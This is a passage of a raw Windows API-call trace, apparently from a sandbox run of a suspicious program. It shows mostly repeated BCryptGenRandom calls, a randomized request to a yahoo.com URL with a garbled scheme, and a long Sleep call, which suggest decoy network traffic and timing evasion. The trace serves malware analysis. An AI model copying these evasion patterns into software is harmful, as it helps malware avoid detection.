pbBuffer=0x46ffd5f) returned 0x0 [0242.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0242.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.420] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.628] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.628] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.628] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.629] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.629] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0242.629] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.629] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a020e4, cbBuffer=0x1d, dwFlags=0x2 | out: pbBuffer=0x3a020e4) returned 0x0 [0242.629] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.630] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.630] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.630] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.630] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.630] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.630] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.630] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.631] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.631] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.631] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.631] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.631] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.631] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.632] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.632] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.632] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.632] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.632] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.632] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.632] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.632] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.633] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.633] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.633] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.633] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.633] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.633] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.634] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.634] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.634] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.634] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.634] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.634] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.634] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.635] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.635] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.635] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.635] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.635] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.635] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.635] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.636] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.636] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.636] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.636] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.636] GetProcessHeap () returned 0x440000 [0242.636] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473770 [0242.636] lstrcpyA (in: lpString1=0x473770, lpString2="Ï(EFs://www.yahoo.com" | out: lpString1="Ï(EFs://www.yahoo.com") returned="Ï(EFs://www.yahoo.com" [0242.636] lstrcatA (in: lpString1="Ï(EFs://www.yahoo.com", lpString2="/tewtXcWtZvgxehh9x5o6nQ/6nyhguepmWlcqdkeia3mrhwuyGygnf97cio0lV4ifVn47/kuDbbmagepqW7xj7x1p7al7AbNxvxsnvlj0boq5fnr8iz8/yrigXdvCswbdejyrax8swK7BolE2uw/mnxpnofvashohG7kPcst8jhlysHO/" | out: lpString1="Ï(EFs://www.yahoo.com/tewtXcWtZvgxehh9x5o6nQ/6nyhguepmWlcqdkeia3mrhwuyGygnf97cio0lV4ifVn47/kuDbbmagepqW7xj7x1p7al7AbNxvxsnvlj0boq5fnr8iz8/yrigXdvCswbdejyrax8swK7BolE2uw/mnxpnofvashohG7kPcst8jhlysHO/") returned="Ï(EFs://www.yahoo.com/tewtXcWtZvgxehh9x5o6nQ/6nyhguepmWlcqdkeia3mrhwuyGygnf97cio0lV4ifVn47/kuDbbmagepqW7xj7x1p7al7AbNxvxsnvlj0boq5fnr8iz8/yrigXdvCswbdejyrax8swK7BolE2uw/mnxpnofvashohG7kPcst8jhlysHO/" [0242.636] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0242.637] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="Ï(EFs://www.yahoo.com/tewtXcWtZvgxehh9x5o6nQ/6nyhguepmWlcqdkeia3mrhwuyGygnf97cio0lV4ifVn47/kuDbbmagepqW7xj7x1p7al7AbNxvxsnvlj0boq5fnr8iz8/yrigXdvCswbdejyrax8swK7BolE2uw/mnxpnofvashohG7kPcst8jhlysHO/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0242.637] GetProcessHeap () returned 0x440000 [0242.637] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473770 | out: hHeap=0x440000) returned 1 [0242.637] GetProcessHeap () returned 0x440000 [0242.637] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a02050 | out: hHeap=0x440000) returned 1 [0242.637] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0242.637] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0242.638] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.638] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0242.638] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0242.638] Sleep (dwMilliseconds=0x1bec1) [0242.920] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0242.921] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0242.921] GetProcessHeap () returned 0x440000 [0242.921] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a02e50 [0242.921] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0242.921] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02e51, cbBuffer=0x24, dwFlags=0x2 | out: pbBuffer=0x3a02e51) returned 0x0 [0242.922] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.922] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.922] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.922] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.922] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.922] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.923] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.923] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.923] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.923] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.923] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.923] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.923] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.923] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.924] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.924] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.924] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.924] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.924] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.924] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.924] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.924] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.925] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.925] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.925] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.925] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.926] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.926] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.926] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.926] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.926] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.926] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.926] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.926] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.927] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.927] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.927] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.927] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.927] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.927] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0242.927] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.927] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.928] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.928] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.928] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.928] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0242.929] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02e75, cbBuffer=0x23, dwFlags=0x2 | out: pbBuffer=0x3a02e75) returned 0x0 [0242.929] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.929] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.929] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.930] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.930] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0242.930] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.930] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.931] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.931] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.931] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0242.931] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.932] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.932] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.932] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.932] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: 